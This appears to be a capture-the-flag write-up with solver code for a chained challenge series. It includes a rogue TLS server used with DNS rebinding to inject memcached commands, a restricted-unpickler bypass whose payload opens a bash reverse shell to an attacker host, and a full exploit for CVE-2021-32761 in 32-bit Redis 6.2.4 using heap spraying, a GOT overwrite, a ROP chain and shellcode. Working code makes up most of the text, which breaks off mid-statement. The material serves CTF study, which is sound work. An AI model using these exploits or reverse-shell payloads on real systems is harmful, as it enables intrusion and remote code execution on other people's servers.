`albireo/TLS/__init__.py`:
```python=1
# Blatantly copied from https://github.com/dfyz/ctf-writeups/blob/master/hxp-2020/security%20scanner/fake_git.py
import argparse
import base64
import hashlib
import hmac
import re
import socket
import struct
import time
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from dataclasses import dataclass
from pathlib import Path
import threading
# RFC 5246, section 5
def prf(secret, label, seed, length):
    def hmac_sha256(key, msg):
        return hmac.digest(key, msg, hashlib.sha256)
    seed = label + seed
    result = b''
    cur_a = seed
    while len(result) < length:
        cur_a = hmac_sha256(secret, cur_a)
        result += hmac_sha256(secret, cur_a + seed)
    return result[:length]
def to_ad(seq_num, tls_type, tls_version, tls_len):
    return struct.pack('>QBHH', seq_num, tls_type, tls_version, tls_len)
# Chosen by fair dice roll, guaranteed to be random.
def get_random_bytes(length):
    return b'A' * length
class TLS:
    # in bytes (i.e., this is 4096 bits)
    KEY_LENGTH = 512
    PKCS_PREFIX = b'\x00\x02'
    # TLS 1.2
    VERSION = 0x0303
    # TLS_RSA_WITH_AES_128_GCM_SHA256, because we don't care to support the full DH exchange.
    CIPHER_SUITE = 0x9c
    CHANGE_CIPHER_SPEC_CONTENT_TYPE = 0x14
    ALERT_CONTENT_TYPE = 0x15
    HANDSHAKE_CONTENT_TYPE = 0x16
    DATA_CONTENT_TYPE = 0x17
    FINISHED_HANDSHAKE_TYPE = 0x14
    @dataclass
    class Record:
        content_type: int
        version: int
        data: bytes
    @dataclass
    class HandshakeRecord:
        handshake_type: int
        data: bytes
    @dataclass
    class SessionKeys:
        master_secret: bytes
        client_key: bytes
        server_key: bytes
        client_salt: bytes
        server_salt: bytes
    def __init__(self, socket, priv_key, certs, session_id):
        self.socket = socket
        self.priv_key = priv_key
        self.certs = certs
        # Chosen by a fair dice roll.
        self.server_random = get_random_bytes(32)
        self.session_id = session_id
        self.client_seq_num = 0
        self.server_seq_num = 0
        self.handshake_log = b''
        self.session_keys = None
        self._shake_hands()
    def _read_record(self, expected_type):
        header = self.socket.recv(5)
        content_type, version, length = struct.unpack('>BHH', header)
        data = self.socket.recv(length)
        assert content_type == expected_type, f'Bad content type: got {content_type}, expected {expected_type}'
        return TLS.Record(content_type, version, data)
    def _write_record(self, record):
        payload = struct.pack('>BHH', record.content_type, record.version, len(record.data)) + record.data
        self.socket.send(payload)
    def _read_handshake_record(self, expected_type, decrypt=False):
        record = self._read_record(TLS.HANDSHAKE_CONTENT_TYPE)
        payload = record.data
        if decrypt:
            payload = self._decrypt(payload, TLS.HANDSHAKE_CONTENT_TYPE, record.version)
        self.handshake_log += payload
        header_size = 4
        header, *_ = struct.unpack('>I', payload[:header_size])
        handshake_type = header >> 24
        assert handshake_type == expected_type, f'Bad handshake type: got {handshake_type}, expected {expected_type}'
        length = header & 0xFF_FF_FF
        return TLS.HandshakeRecord(handshake_type, payload[header_size:header_size + length])
    def _write_handshake_record(self, record, encrypt=False):
        header = (record.handshake_type << 24) | len(record.data)
        payload = struct.pack('>I', header) + record.data
        if encrypt:
            payload = self._encrypt(payload, TLS.HANDSHAKE_CONTENT_TYPE)
        self.handshake_log += payload
        self._write_record(TLS.Record(TLS.HANDSHAKE_CONTENT_TYPE, TLS.VERSION, payload))
    def _get_server_hello(self):
        return b''.join([
            struct.pack('>H', TLS.VERSION),
            self.server_random,
            struct.pack('B', len(self.session_id)),
            self.session_id,
            # No compression, no extension
            struct.pack('>HBH', TLS.CIPHER_SUITE, 0, 0),
        ])
    def _get_certificate(self):
        def int16_to_int24_bytes(x):
            return b'\x00' + struct.pack('>H', x)
        packed_certs = b''.join([
            int16_to_int24_bytes(len(cert)) + cert
            for cert in self.certs
        ])
        return int16_to_int24_bytes(len(packed_certs)) + packed_certs
    def derive_keys(self, encrypted_premaster_secret, client_random):
        assert len(encrypted_premaster_secret) == TLS.KEY_LENGTH
        encrypted_premaster_secret = int.from_bytes(encrypted_premaster_secret, byteorder='big')
        premaster_secret = pow(encrypted_premaster_secret, self.priv_key.d, self.priv_key.n).to_bytes(TLS.KEY_LENGTH, byteorder='big')
        assert premaster_secret.startswith(TLS.PKCS_PREFIX)
        premaster_secret = premaster_secret[premaster_secret.find(b'\x00', len(TLS.PKCS_PREFIX)) + 1:]
        assert len(premaster_secret) == 48
        master_secret = prf(premaster_secret, b'master secret', client_random + self.server_random, 48)
        enc_key_length, fixed_iv_length = 16, 4
        expanded_key_length = 2 * (enc_key_length + fixed_iv_length)
        key_block = prf(master_secret, b'key expansion', self.server_random + client_random, expanded_key_length)
        return TLS.SessionKeys(
            master_secret=master_secret,
            client_key=key_block[:enc_key_length],
            server_key=key_block[enc_key_length:2 * enc_key_length],
            client_salt=key_block[2 * enc_key_length:2 * enc_key_length + fixed_iv_length],
            server_salt=key_block[2 * enc_key_length + fixed_iv_length:],
        )
    def _get_server_finished(self):
        session_hash = hashlib.sha256(self.handshake_log).digest()
        return prf(self.session_keys.master_secret, b'server finished', session_hash, 12)
    def _encrypt(self, data, tls_type):
        explicit_nonce = get_random_bytes(8)
        cipher = AES.new(self.session_keys.server_key, AES.MODE_GCM, nonce=self.session_keys.server_salt + explicit_nonce)
        cipher.update(to_ad(self.server_seq_num, tls_type, TLS.VERSION, len(data)))
        ciphertext, tag = cipher.encrypt_and_digest(data)
        self.server_seq_num += 1
        return explicit_nonce + ciphertext + tag
    def _decrypt(self, data, tls_type, tls_version):
        cipher = AES.new(self.session_keys.client_key, AES.MODE_GCM, nonce=self.session_keys.client_salt + data[:8])
        ciphertext = data[8:-16]
        tag = data[-16:]
        cipher.update(to_ad(self.client_seq_num, tls_type, tls_version, len(ciphertext)))
        self.client_seq_num += 1
        return cipher.decrypt_and_verify(ciphertext, tag)
    def read(self):
        record = self._read_record(TLS.DATA_CONTENT_TYPE)
        payload = self._decrypt(record.data, TLS.DATA_CONTENT_TYPE, record.version)
        #print(f'Got a message of length {len(payload)}')
        return payload
    def write(self, msg):
        payload = self._encrypt(msg, TLS.DATA_CONTENT_TYPE)
        self._write_record(TLS.Record(TLS.DATA_CONTENT_TYPE, TLS.VERSION, payload))
        #print(f'Sent a message of length {len(payload)}')
    def _shake_hands(self):
        client_hello = self._read_handshake_record(0x1).data
        client_random = client_hello[2:2 + 32]
        #print(f'Got client hello')
        self._write_handshake_record(TLS.HandshakeRecord(0x2, self._get_server_hello()))
        #print(f'Sent server hello with session id {self.session_id}')
        self._write_handshake_record(TLS.HandshakeRecord(0xb, self._get_certificate()))
        #print(f'Sent {len(self.certs)} certificates')
        self._write_handshake_record(TLS.HandshakeRecord(0xe, b''))
        #print(f'Sent server hello done')
        # Skip the redundant premaster secret length.
        encrypted_premaster_secret = self._read_handshake_record(0x10).data[2:]
        #print(f'Got a premaster secret')
        self.session_keys = self.derive_keys(encrypted_premaster_secret, client_random)
        self._read_record(TLS.CHANGE_CIPHER_SPEC_CONTENT_TYPE)
        client_finished = self._read_handshake_record(TLS.FINISHED_HANDSHAKE_TYPE, decrypt=True)
        #print(f'Got client finished')
        self._write_record(TLS.Record(TLS.CHANGE_CIPHER_SPEC_CONTENT_TYPE, TLS.VERSION, b'\x01'))
        server_finished = TLS.HandshakeRecord(TLS.FINISHED_HANDSHAKE_TYPE, self._get_server_finished())
        self._write_handshake_record(server_finished, encrypt=True)
        #print(f'Sent server finished, the connection is ready')
def get_http_response(code, headers, content):
    headers.update({
        'Connection': 'close',
        'Content-Length': str(len(content)),
    })
    return '\r\n'.join([
        f'HTTP/1.1 {code} Whatever',
        '\r\n'.join([
            f'{k}: {v}' for k, v in headers.items()
        ]),
        '',
        content,
    ]).encode()
def run_rogue_server(key, cert, port, delay, location, payloads):
    payloads += [b'LAST_CHECK_DUMMY']
    def run():
        priv_key = RSA.import_key((Path(__file__).parent / Path(key)).read_text())
        certs = [
            base64.b64decode(''.join(
                cert_line
                for cert_line in cert.splitlines()
                if not cert_line.startswith('-')
            ))
            for cert in (Path(__file__).parent / Path(cert)).read_text().split('\n\n')
        ]
        server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server_socket.bind(('0.0.0.0', port))
        server_socket.listen(5)
        print('Server started.')
        success_printed = [False]*len(payloads)
        pi = 0
        while pi < len(payloads):
            client_socket, address = server_socket.accept()
            print(f'Got a connection from {address}!')
            print(f'Trying #{pi}')
            session_id = payloads[pi].ljust(32, b'\0')
            try:
                # Sometimes throw AssertionError due to ALERT_CONTENT_TYPE at self-redirect
                tls = TLS(client_socket, priv_key, certs, session_id)
                http_request = tls.read()
                assert b'fdzz' not in http_request
            except:
                # This indicates that the previous payload redirected to the current payload.
                # Thus, we must retry previous payload.
                print(f'Retry #{pi - 1}...')
                pi -= 1
                client_socket.close()
                continue
            if pi > 0 and not success_printed[pi - 1]:
                print(f'Checked #{pi - 1} success. (payload {payloads[pi - 1]})')
                success_printed[pi - 1] = True
            pi += 1
            time.sleep(delay)
            headers = {
                'Location': location + '?fdzz',
            }
            tls.write(get_http_response(302, headers, ''))
            client_socket.close()
    t = threading.Thread(target=run, daemon=True)
    t.start()
    return t
```
`albireo/solver_albireo.py`:
```python=1
#!/usr/bin/env python3
import socket, binascii
import requests
import base64
import time
import pickle
if __name__ == '__main__':
    from TLS import run_rogue_server
else:
    from .TLS import run_rogue_server
def primer(HOST, PORT, payload):
    def nslookup(host):
        return list(set(ai[4][0] for ai in socket.getaddrinfo(host, None) if ai[0] == socket.AF_INET))
    def ip2hex(ip):
        return binascii.hexlify(socket.inet_aton(ip)).decode('ascii')
    s = requests.Session()
    info = s.get(f'http://{HOST}:{PORT}/info').json()
    # Disable Redis agents
    for k in info['version']['trino']:
        if 'redis' in k:
            s.post(f'http://{HOST}:{PORT}/failover', json={'url': k})
    poisoner_hex = ip2hex('REDACTED')
    albireo_hex = ip2hex(info['network']['trino']['albireo'][0])
    rebinder = f'{poisoner_hex}.{albireo_hex}.rbndr.us'
    print(f'rebinder: {rebinder}')
    s2 = requests.Session()
    s2.get(f'http://{HOST}:{PORT}/')
    sess = s2.cookies['session'].split('.')[0]
    print(f'session: {sess}')
    # init: b'\nms s:0123456789ab 0\n\r\n'
    # append: b'\nms s:0123456789ab 6 MA\nABCDEF\r\n'
    def ms_init(sid):
        return f'\nms s:{sid} 0\n\r\n'.encode('ascii')
    def ms_append(sid, dat):
        assert len(dat) <= 6
        return f'\nms s:{sid} {len(dat)} MA\n'.encode('ascii') + dat + b'\r\n'
    payloads = [ms_init(sess)] + [
        ms_append(sess, payload[i:i+6]) for i in range(0, len(payload), 6)
    ]
    print(f'payloads count: {len(payloads)}')
    t = run_rogue_server('key.pem', 'cert.pem', 65401, 0.2, f'https://{rebinder}:65401/', payloads)
    while t.is_alive():
        s.post(f'http://{HOST}:{PORT}/query', json={'url': f'https://{rebinder}:65401/'})
        time.sleep(0.2)
    # joining for "aesthetics"
    t.join()
    for c in s2.cookies:
        c.expires += 60*60*24*30
    return s2
if __name__ == '__main__':
    HOST, PORT = 'localhost', 15961
    s = primer(HOST, PORT, pickle.dumps({'_permanent': True, 'flag': 'albireo'}))
    fetch = s.get(f'http://{HOST}:{PORT}/flag').json()
    print(fetch['FLAG_ALBIREO'])
```
`albireo/__init__.py`:
```python=1
from .solver_albireo import primer
```
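
The 6-byte chunk size used by `ms_append` in `solver_albireo.py` appears to follow from the rogue server padding every payload into a TLS session ID with `ljust(32, b'\0')`; a TLS 1.2 session ID holds at most 32 bytes. The sketch below re-implements the two helpers standalone and checks the resulting lengths. The 12-character session ID and the sample payload are placeholders (the ID length is taken from the comments in the solver), not values from the challenge server.

```python
def ms_init(sid: str) -> bytes:
    # Same format as the solver: create an empty value for key s:<sid>.
    return f'\nms s:{sid} 0\n\r\n'.encode('ascii')

def ms_append(sid: str, dat: bytes) -> bytes:
    # Same format as the solver: append at most 6 bytes to key s:<sid>.
    assert len(dat) <= 6
    return f'\nms s:{sid} {len(dat)} MA\n'.encode('ascii') + dat + b'\r\n'

def chunk_payload(sid: str, payload: bytes, size: int = 6) -> list:
    # One init command followed by one append command per chunk.
    return [ms_init(sid)] + [
        ms_append(sid, payload[i:i + size]) for i in range(0, len(payload), size)
    ]

sid = '0123456789ab'             # placeholder 12-character session ID
payload = b'hello, memcached'    # placeholder 16-byte payload
chunks = chunk_payload(sid, payload)

for c in chunks:
    print(len(c), c)
```

With a 12-character ID, a full 6-byte append command is exactly 32 bytes long, so a larger chunk would no longer fit into a single session ID.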
</details>
## H. Trino: Pieces
Category: Misc, Pwnable, Web\
Author: [Xion]\
Solvers: 2
<details>
<summary>Description</summary>
`Stage 2`
Stitch the `Pieces` together for the Big Picture.
> Note: All `Trino` chal server & public files are equivalent (excluding Specfile descriptions).
</details>
<details>
<summary>Solution</summary>
**TL;DR**: Unpickle chaining with magic attributes to pop shell
With the primitives from `Trino: Albireo` we can now deserialize arbitrary data, but with a twist: the system uses a custom deserializer to only allow objects from `picklable`, as shown in `serializer.py`:
```python=7
class Unpickler(pickle.Unpickler):
    def find_class(self, module, name):
        assert module == 'picklable'
        return getattr(__import__('picklable'), name)
```
The idea to solve this is to use everything inside `picklable`. For example, there are imports inside `picklable` such as `requester`, magic methods such as `__setattr__` and `__getattribute__`, as well as `__builtins__` and `__dict__` fields.
We can chain these as the following:
1. Set `picklable.picklable` to `picklable.__dict__` with `picklable.__setattr__`. This will be used in the later steps.
2. Overwrite `__import__` with `picklable.__getattribute__`. This allows us to access attributes inside `picklable.__dict__`, as `__import__('picklable').attr => picklable.picklable.attr => picklable.__dict__.attr`.
3. Add everything inside `__builtins__` into `picklable.__dict__` using `update`.
4. Fetch `eval` and overwrite `picklable.picklable` again with `eval` through `picklable.__dict__.__setitem__`.
5. Enjoy `eval(cmd) == picklable.picklable.__call__(cmd)`! Note that `__builtins__['__import__']` is tainted so importing is not easy; use an already imported module, like `picklable.requester.whatwg_url.six.sys.modules["os"]`.
> Note: This challenge is in essence equivalent to [Balsn CTF 2019 pyshv2].
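
The first step of the chain can be tried in isolation. The following is a minimal sketch, assuming an empty stand-in module registered as `picklable` (the real module has more content) and two hand-written protocol-0 pickles. It only shows that the restricted `find_class` rejects foreign modules while still handing out the module's own magic methods; it is not the full exploit.

```python
import io
import pickle
import sys
import types

# Hypothetical, empty stand-in for the challenge's `picklable` module.
sys.modules['picklable'] = types.ModuleType('picklable')

class Unpickler(pickle.Unpickler):
    def find_class(self, module, name):
        assert module == 'picklable'
        return getattr(__import__('picklable'), name)

def loads(data: bytes):
    return Unpickler(io.BytesIO(data)).load()

# GLOBAL os.system + REDUCE: find_class refuses the module before anything runs.
blocked = b"cos\nsystem\n(S'id'\ntR."
try:
    loads(blocked)
    rejected = False
except AssertionError:
    rejected = True

# GLOBAL picklable.__setattr__ + REDUCE with ('marker', 1):
# the bound method of the module object is allowed and gets called.
allowed = b"cpicklable\n__setattr__\n(S'marker'\nI1\ntR."
result = loads(allowed)
marker = sys.modules['picklable'].marker

print(rejected, result, marker)
```

Because `__setattr__`, `__getattribute__` and `__dict__` all resolve through `getattr(module, name)`, the module-name check alone does not prevent the module from being rewired from inside a pickle.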
</details>
<details>
<summary>Solver Code</summary>
Unpickle exploit referenced from [Balsn CTF 2019 pyshv2] writeup.
`solver_pieces.py`:
```python=1
#!/usr/bin/env python3
import pickle, sys
from albireo import primer
### Unpickler bypass code referenced from https://ctftime.org/writeup/16723
class FakeMod(type(sys)):
    modules = {}
    def __init__(self, name):
        self.d = {}
        super().__init__(name)
    def __getattribute__(self, name):
        d = self()
        return d[name]
    def __call__(self):
        return object.__getattribute__(self, "d")
def attr(s):
    mod, name = s.split(".")
    if mod not in FakeMod.modules:
        FakeMod.modules[mod] = FakeMod(mod)
    d = FakeMod.modules[mod]()
    if name not in d:
        def f(): pass
        f.__module__ = mod
        f.__qualname__ = name
        f.__name__ = name
        d[name] = f
    return d[name]
def dumps(obj):
    # use python version of dumps
    # which is easier to hack
    pickle.dumps = pickle._dumps
    orig = sys.modules
    sys.modules = FakeMod.modules
    s = pickle.dumps(obj)
    sys.modules = orig
    return s
def craft(func, *args, dict=None, list=None, items=None):
    class X:
        def __reduce__(self):
            tup = func, tuple(args)
            if dict or list or items:
                tup += dict, list, items
            return tup
    return X()
def get_payload(LHOST, LPORT):
    c1 = craft(attr("picklable.__setattr__"), "picklable", attr("picklable.__dict__"))
    c2 = craft(
        attr("picklable.__getattribute__"),
        "__builtins__",
        items=[("__import__", attr("picklable.__getattribute__"))]
    )
    bs = craft(attr("picklable.get"), "__builtins__")
    c3 = craft(attr("picklable.update"), bs)
    ev = craft(attr("picklable.get"), "eval")
    c4 = craft(attr("picklable.__setitem__"), "picklable", ev)
    c5 = craft(attr("picklable.__call__"), f'__import__("requester").whatwg_url.six.sys.modules["os"].system("bash -c \'bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1\'")')
    obj = craft(attr("picklable.__setattr__"), "code", [c1, c2, c3, c4, c5])
    s = dumps(obj)
    return s
###
if __name__ == '__main__':
    HOST, PORT = 'localhost', 15961
    LHOST, LPORT = 'REDACTED', 12345
    # We can speed this up by splitting the payload & sending them concurrently,
    # then run the payload in our desired order
    s = primer(HOST, PORT, get_payload(LHOST, LPORT))
    # If we pop shell, this will block!
    fetch = s.get(f'http://{HOST}:{PORT}/')
```
</details>
## I. Trino: Rendezvous
Category: Pwnable\
Author: [Xion]\
Solvers: 0
<details>
<summary>Description</summary>
`Stage 3 - 1`
`Rendezvous` back to Zero with this one weird trick!
> Note: All `Trino` chal server & public files are equivalent (excluding Specfile descriptions).
</details>
<details>
<summary>Solution</summary>
**TL;DR**: RCE on 32-bit Redis 6.2.4 via [CVE-2021-32761], which requires bypassing an incorrect mitigation (blocking `CONFIG SET`)
After popping a shell on `Trino: Pieces`, we can interact directly with the Redis instances. For `Rendezvous`, players must gain RCE on 32-bit Redis 6.2.4, where many "harmful" commands are removed by the config file.
Scanning through Redis CVEs, players can find [CVE-2021-32761], which is applicable to this Redis version & architecture.
The root cause of the vuln is the lack of checked arithmetic combined with mixed use of differently-sized types. On 32-bit systems, the code below can overflow:
[redis/bitops.c#L991](https://github.com/redis/redis/blob/6.2.4/src/bitops.c#L991):
```c=991
if (highest_write_offset < bitoffset + bits - 1)
highest_write_offset = bitoffset + bits - 1;
```
As a result, the bitfield is not expanded to the required size:
```c=1028
/* Lookup by making room up to the farest bit reached by
* this operation. */
if ((o = lookupStringForBitCommand(c,
highest_write_offset)) == NULL) {
zfree(ops);
return;
}
}
```
Thus, an attacker is able to write (and at the same time read the previous value) out-of-bounds from a smaller bitfield, where the OOB index in terms of bytes from the bitfield base ptr is about `0x20000000` (=512MB) due to overflow constraints.
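
To make the wrap-around concrete, here is a small arithmetic sketch. It assumes that `bitoffset` and `highest_write_offset` are 32-bit `size_t` values on this build (modeled with a mask), and it uses the two offsets that appear in the solver below. The helper names are made up for illustration.

```python
MASK32 = 0xFFFFFFFF  # models a 32-bit size_t (assumption about the build)

def highest_write_offset_32bit(bitoffset: int, bits: int) -> int:
    # Mirrors `bitoffset + bits - 1` with 32-bit wrap-around.
    return (bitoffset + bits - 1) & MASK32

def byte_index(bitoffset: int) -> int:
    # Byte that the first bit of the field actually lands in.
    return bitoffset >> 3

# (bit offset, field width) pairs used by the solver: `u32` and `i64` fields.
cases = [(4294967288, 32), (4294967295, 64)]
results = [
    (highest_write_offset_32bit(ofs, bits), byte_index(ofs)) for ofs, bits in cases
]
for (ofs, bits), (wrapped, idx) in zip(cases, results):
    print(f'offset={ofs} bits={bits}: wrapped highest offset={wrapped}, byte index={hex(idx)}')
```

In both cases the wrapped value is tiny (23 and 62), so the string is only grown to a few bytes, while the actual access happens at byte index `0x1fffffff`.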
Players can utilize Lua scripts via the `eval` command to spray objects onto the heap, then use the OOB bug to modify an object's type and leak addresses. Modify the type to a string and point it to a proper location in memory to gain nearly arbitrary read/write, then pop a shell (GOT overwrite, etc.).
</details>
<details>
<summary>Solver Code</summary>
This exploit is meant to run on `Pieces` after popping shell.
`solver_rendezvous.py`:
```python=1
#!/usr/bin/env python3
import socket
import ctypes, struct
class FakeELF:
    def __init__(self, **kwargs):
        assert kwargs.keys() <= {'sym', 'got'}
        self._address = 0
        self.sym = kwargs.get('sym', {})
        self.got = kwargs.get('got', {})
    @property
    def address(self):
        return self._address
    @address.setter
    def address(self, base):
        delta = base - self._address
        self._address = base
        self.sym = {k: v+delta for k, v in self.sym.items()}
        self.got = {k: v+delta for k, v in self.got.items()}
class FakeRemote:
    def __init__(self, host, port):
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.connect((host, port))
    def send(self, data):
        if isinstance(data, str):
            data = data.encode('ascii')
        self.s.send(data)
    def recv(self, length):
        data = b''
        while len(data) < length:
            recv = self.s.recv(length - len(data))
            if not recv:
                raise EOFError
            data += recv
        return data
    def recvall(self):
        data = b''
        while True:
            recv = self.s.recv(0x1000)
            if not recv:
                break
            data += recv
        return data
    def recvuntil(self, until, drop=False):
        data = b''
        while not data.endswith(until):
            recv = self.s.recv(1)
            if not recv:
                raise EOFError
            data += recv
        return data[:-len(until)] if drop else data
    def close(self):
        self.s.close()
class FakeLogger:
    def info(self, s):
        print(f'[*] {s}')
    def success(self, s):
        print(f'[+] {s}')
HOST, PORT = 'rendezvous', 65402
p = FakeRemote(HOST, PORT)
log = FakeLogger()
binary = FakeELF(got={'strtold': 0x246108, 'fcntl64': 0x246364, 'vsnprintf': 0x246234, 'backtrace': 0x2460cc})
libc = FakeELF(sym={'system': 0x3ec00, 'mprotect': 0xf5fd0, 'strtold': 0x35790, 'vsnprintf': 0x6fdd0, '_exit': 0xc0c45})
ld = FakeELF(sym={'_rtld_global': 0x29040})
def query(qs):
    def _query(q):
        if isinstance(q, str):
            q = q.encode('ascii')
        if isinstance(q, (list, tuple)):
            p.send(f'*{len(q)}\r\n'.encode('ascii'))
            for qe in q:
                _query(qe)
        else:
            assert isinstance(q, (bytes, bytearray))
            p.send(f'${len(q)}\r\n'.encode('ascii') + q + b'\r\n')
    def _resp():
        first = p.recv(1)
        if first == b'+':
            return p.recvuntil(b'\r\n', drop=True)
        elif first == b'-':
            err = p.recvuntil(b'\r\n', drop=True)
            raise RuntimeError(f'Redis returned Error: {err}')
        elif first == b':':
            return int(p.recvuntil(b'\r\n', drop=True))
        elif first == b'$':
            length = int(p.recvuntil(b'\r\n', drop=True))
            data = p.recv(length)
            assert p.recv(2) == b'\r\n'
            return data
        else:
            assert first == b'*'
            length = int(p.recvuntil(b'\r\n', drop=True))
            return [_resp() for _ in range(length)]
    if isinstance(qs, str):
        qs = qs.encode('ascii')
    if isinstance(qs, (bytes, bytearray)):
        p.send(qs + b'\r\n')
    else:
        _query(qs)
    return _resp()
def p32(v, endian='little'):
    return struct.pack('<I' if endian=='little' else '>I', v)
def u32(v, endian='little'):
    return struct.unpack('<I' if endian=='little' else '>I', v)[0]
def endian_rev(v):
    return u32(p32(v, endian='big'), endian='little')
# Note: The use of debug command is avoided, allowing the exploit to be sent with a single eval command.
log.info('Spraying heap & setting up memory layout...')
assert query('''eval "for i=0,0x180000,1 do redis.call('set', 'K'..i, 0) end return 1337" 0''') == 1337
assert query('''eval "for i=0,0x180000,1 do if i%0x100==0 then redis.call('set', 'IIIIIIIIIIIIIIII'..i, 0) end redis.call('set', 'K'..i, '') end return 31337" 0''') == 31337
assert query('''setbit fill 335544320 0''') == 0
assert query('''setbit L 3221225472 0''') == 0
# leak address from K{K_idx} (embstr)
K_addr = endian_rev(query('''bitfield L set u32 4294967288 0''')[0]) - 0xf
assert K_addr & 0x7 == 0
log.info(f'Leaked address {hex(K_addr)}')
# set K{K_idx + 1} type = OBJ_STRING, encoding = OBJ_ENCODING_INT
assert query(f'bitfield L set i64 4294967295 {0x10 >> 1}')[0] & 0x7f == 0x80 >> 1
K_idx = query('''eval "for i=0x100000,0,-1 do if redis.call('get', 'K'..i)~='' then return i end end return -1" 0''') - 1
assert K_idx >= 0
log.success(f'Leak was from K{K_idx}')
L_addr = K_addr - 0x20000000
L_data = L_addr + 9
log.info(f'sdshdr32 struct address of L: {hex(L_addr)} (data {hex(L_data)})')
# prepare fake sds object inside L
fakesds = L_addr + 0x17000000
fakesds_data = fakesds + 9
assert query([
'setrange', 'L', str(fakesds - L_data),
p32(0x7fffffff)*2 + bytes([3])
]) == 0x18000001
# set K{K_idx + 1} ptr to fakesds_data
delta = ctypes.c_int32(fakesds_data).value - ctypes.c_int32(K_addr + 0x10 + 0xf).value
assert query(f'incrby K{K_idx + 1} {delta}') == ctypes.c_int32(fakesds_data).value
# set K{K_idx + 1} type = OBJ_STRING, encoding = OBJ_ENCODING_RAW
assert query('bitfield L set i64 4294967295 0')[0] == 0x10 >> 1
log.success(f'K{K_idx + 1}->ptr = fakesds @ {hex(fakesds)}')
def reader(addr, length):
    ofs = (addr - fakesds_data) & 0xffffffff
    assert ofs + length <= 0x20000000
    return query(f'getrange K{K_idx + 1} {ofs} {ofs + length - 1}')
# leak libc address
expected_at = K_addr - ((K_idx & 0xff) + 1) * 0x10 + 4
for i in range(0x1000):
    addr = u32(reader(expected_at + i * 0x10, 4)) + 0x1c460
    if addr & 0xfff == 0:
        libc.address = addr
        break
else:
    assert False
assert reader(libc.address, 4) == b'\x7FELF'
log.success(f'libc base: {hex(libc.address)}')
# 0x678000 for local, 0x679000 at remote. Dunno why...
for ofs in range(0x678000, 0x679001, 0x1000):
    log.info(f'Trying offset {hex(ofs)}...')
    ld.address = libc.address + ofs
    if reader(ld.address, 4) == b'\x7FELF':
        log.success(f'ld base found at libc + {hex(ofs)}')
        break
else:
    assert False
log.info (f'ld base: {hex(ld.address)}')
# get link_map struct of redis-server binary from _rtld_global._dl_ns._ns_loaded
rtld_global = ld.sym['_rtld_global']
link_map = u32(reader(rtld_global, 4))
log.success(f'link_map: {hex(link_map)}')
# leak redis-server binary from link_map
binary.address = u32(reader(link_map, 4))
assert binary.address & 0xfff == 0
log.success(f'redis-server base: {hex(binary.address)}')
# now set fakesds to some data inside redis-server (offset found using script below)
'''
>>> for i in range(0x100000):
... length = u32(bin.read(i, 4))
... alloc = u32(bin.read(i+4, 4))
... flag = bin.read(i+8, 1)[0]
... if length in range(0x20000000, 0x80000000) and alloc >= length and flag & 0b111 == 3:
... print(hex(i), hex(length), hex(alloc), hex(flag))
...
0x15a 0x74a8001b 0x74a8001b 0x1b
0x1f9 0x2756d67d 0x99a996ab 0x2b
0x255 0x44180004 0xc1b00001 0x3
(...)
'''
fakesds_bin = binary.address + 0x255
fakesds_bin_data = fakesds_bin + 9
# set K{K_idx + 1} type = OBJ_STRING, encoding = OBJ_ENCODING_INT
assert query(f'bitfield L set i64 4294967295 {0x10 >> 1}')[0] == 0
# set K{K_idx + 1} ptr to fakesds_bin_data
delta = ctypes.c_int32(fakesds_bin_data).value - ctypes.c_int32(fakesds_data).value
assert query(f'incrby K{K_idx + 1} {delta}') == ctypes.c_int32(fakesds_bin_data).value
# set K{K_idx + 1} type = OBJ_STRING, encoding = OBJ_ENCODING_RAW
assert query('bitfield L set i64 4294967295 0')[0] == 0x10 >> 1
log.success(f'K{K_idx + 1}->ptr = fakesds @ {hex(fakesds_bin_data)}')
def writer(addr, data):
    ofs = (addr - fakesds_bin_data) & 0xffffffff
    assert ofs + len(data) <= 0x20000000
    assert query(['setrange', f'K{K_idx + 1}', str(ofs), data]) == 0x44180004
# overwrite fcntl64@got with return FD_CLOEXEC;
# Note: We already have RCE, so simply opening a new port from attacker server
# & writing to it would suffice. This is just to re-use the already open
# connection as a POC
writer(binary.got['fcntl64'], p32(libc.address + 0x2ffa8))
# overwrite strtold@got with ROP popN-ret gadget
shellcode_addr = (L_data + 0x1000) & (~0xfff)
'''
libc gadgets
0x000af30b : add esp, 0x38 ; pop ebx ; ret
0x000ae987 : pop eax ; pop edi ; pop esi ; ret
0x000190f1 : ret
0x000314db : ret 0x1174
esp + 0x1450
'''
writer(binary.got['strtold'], p32(libc.address + 0xaf30b))
payload = b''.join([
b' \0\0\0', # isspace(buf[0])
p32(0),
p32(libc.sym['mprotect']), # first ret
p32(libc.address + 0xae987),
p32(shellcode_addr),
p32(0x1000),
p32(7), # on mprotect success, eax = 0 which is an error for string2ld.
] + [p32(libc.address + 0x190f1)] * 0x9d + [
p32(libc.address + 0x314db),
p32(binary.address + 0x576c8) # inside function epilogue of string2ld
])
try:
    query([
        b'incrbyfloat',
        b'lol',
        payload
    ])
except:
    pass # We expect Redis to return ERR!
else:
    assert False
# fix it back up :)
writer(binary.got['strtold'], p32(libc.sym['strtold']))
# write our magical shellcode
'''
mov eax, dword ptr [esp+0xc]
cmp dword ptr [eax], 0x6e6b6e75 # 'unkn'
jnz $+9
mov ecx, 0xdeadbeef => libc.sym['vsnprintf']
xor eax, eax
jmp ecx
pusha
mov ecx, 0x1337c0d3 => shell script addr
push ecx
mov ecx, 0xcafebabe => libc.sym['system']
call ecx
pop ecx
popa
xor eax, eax
ret
'''
shellcode = b'\x8B\x44\x24\x0C\x81\x38\x75\x6E\x6B\x6E\x74\x09\xB9\xEF\xBE\xAD\xDE\x31\xC0\xFF\xE1\x60\xB9\xD3\xC0\x37\x13\x51\xB9\xBE\xBA\xFE\xCA\xFF\xD1\x59\x61\x31\xC0\xC3'
shellcode = shellcode.ljust(0x800)
shellcode = shellcode.replace(p32(0xdeadbeef), p32(libc.sym['vsnprintf']))
shellcode = shellcode.replace(p32(0x1337c0d3), p32(shellcode_addr + 0x800))
shellcode = shellcode.replace(p32(0xcafebabe), p32(libc.sym['system']))
# send payload to top fd
shellcode += f'''bash -c 'i=100; while [ $i -ge 0 ]; do if [ -e /proc/self/fd/$i ]; then cat /flag_* 1>&$i; fi; i=$(( i - 1 )); done\''''.encode('ascii')
assert query([
